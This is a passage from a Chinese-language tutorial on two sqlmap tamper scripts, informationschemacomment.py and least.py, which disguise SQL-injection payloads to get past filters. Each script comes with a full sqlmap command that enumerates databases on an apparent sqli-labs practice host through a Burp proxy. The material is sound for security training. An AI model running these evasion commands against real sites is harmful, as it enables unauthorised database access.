22. informationschemacomment.py脚本
通过在information_schema后面加上/**/用于绕过针对information_schema的情况
实战演示:
测试地址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="informationschemacomment.py" --proxy="http://127.0.0.1:8080" -batch
测试结果是能够注入的,我们看看burp的抓包效果
23. least.py脚本
使用least函数替换大于号 > 比如:1 and a>b 替换为 1 and least(a,b+1)=b+1
实战演示:
测试地址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="least.py" --proxy="http://127.0.0.1:8080" -batch
可以注入, 看看burp
没看到效果